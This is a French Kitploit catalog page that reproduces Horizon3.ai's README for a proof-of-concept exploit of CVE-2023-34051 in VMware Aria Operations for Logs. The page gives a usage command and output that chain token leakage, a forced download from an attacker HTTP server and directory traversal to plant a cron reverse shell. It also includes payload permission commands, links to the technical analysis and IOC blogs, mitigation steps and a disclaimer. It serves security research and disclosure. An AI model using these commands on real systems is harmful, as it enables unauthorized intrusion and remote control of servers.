Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-34051 — VMware Aria Operations for Logs CVE-2023-34051 | Kitploit
Outils/GitHubGitHub/horizon3ai/cve-2023-34051
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationMouvement LatéralExploitation d'Applications WebPost-ExploitationTests d'IntrusionCommandement et ContrôleAuthentificationRed Teaming
GitHubhorizon3ai/cve-2023-34051
621148il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-34051

VMware Aria Operations for Logs CVE-2023-34051

Voir le dépôt

CVE-2023-34051

CVE-2023-34051 est un contournement d'authentification qui contourne le correctif de VMSA-2023-0001. VMSA-2023-0001 pour vRealize Log Insight inclut les CVE suivantes :

  • Vulnérabilité de traversée de répertoire dans VMware vRealize Log Insight (CVE-2022-31706)
  • Vulnérabilité de contrôle d'accès cassé dans VMware vRealize Log Insight (CVE-2022-31704)
  • VMware vRealize Log Insight contient une vulnérabilité de divulgation d'informations (CVE-2022-31711)

La configuration par défaut de cette vulnérabilité écrit une tâche cron pour créer un reverse shell. Assurez-vous de modifier le fichier payload pour l'adapter à votre environnement.

Analyse technique

Une analyse technique de la cause racine de la vulnérabilité est disponible sur notre blog : https://www.horizon3.ai/vmware-aria-operations-for-logs-cve-2023-34051-technical-deep-dive

Indicateurs de compromission

Pour analyser les instances Log Insight à la recherche d'indicateurs de compromission, consultez notre blog IOC : https://www.horizon3.ai/vmware-vrealize-cve-2022-31706-iocs/

Résumé

Ce POC abuse de l'usurpation d'adresse IP et de divers points de terminaison RPC Thrift pour parvenir à une écriture arbitraire de fichier.

Utilisation

root@kitploit:~
$ python3 VMSA-2023-0001.py --target_address 192.168.4.133 --http_server_address 192.168.4.60 --http_server_port 8080 --payload_file payload --payload_path /etc/cron.d/exploit 
[+] Using CVE-2022-31711 to leak node token
[+] Found node token: f261d2f5-71fa-45fd-a0a0-6114a55a8fb8
[+] Using CVE-2022-31704 to trigger malicious file download
192.168.4.133 - - [30/Jan/2023 16:43:41] "GET /exploit.tar HTTP/1.1" 200 -
[+] File successfully downloaded
[+] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell
[+] Payload successfully delivered

Dépannage

Pour que cette attaque fonctionne, un attaquant doit avoir la même adresse IP qu'un nœud maître / worker. Voir le blog ci-dessus pour plus de détails.

Si vous utilisez une charge utile basée sur cron, assurez-vous que le fichier de charge utile a les permissions et le propriétaire appropriés :

root@kitploit:~
sudo chown root:root payload
root@kitploit:~
sudo chmod 0644 payload 

Atténuations

Mettez à jour vers la dernière version ou atténuez le risque en suivant les instructions dans la VMSA https://www.vmware.com/security/advisories/VMSA-2023-0021.html

Suivez l'équipe d'attaque Horizon3.ai sur Twitter pour les dernières recherches en sécurité :

  • Horizon3 Attack
  • James Horseman
  • Zach Hanley

Avertissement

Ce logiciel a été créé purement à des fins de recherche académique et pour le développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes, sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables de l'utilisation abusive du logiciel. Utilisez-le de manière responsable.

Télécharger l’outil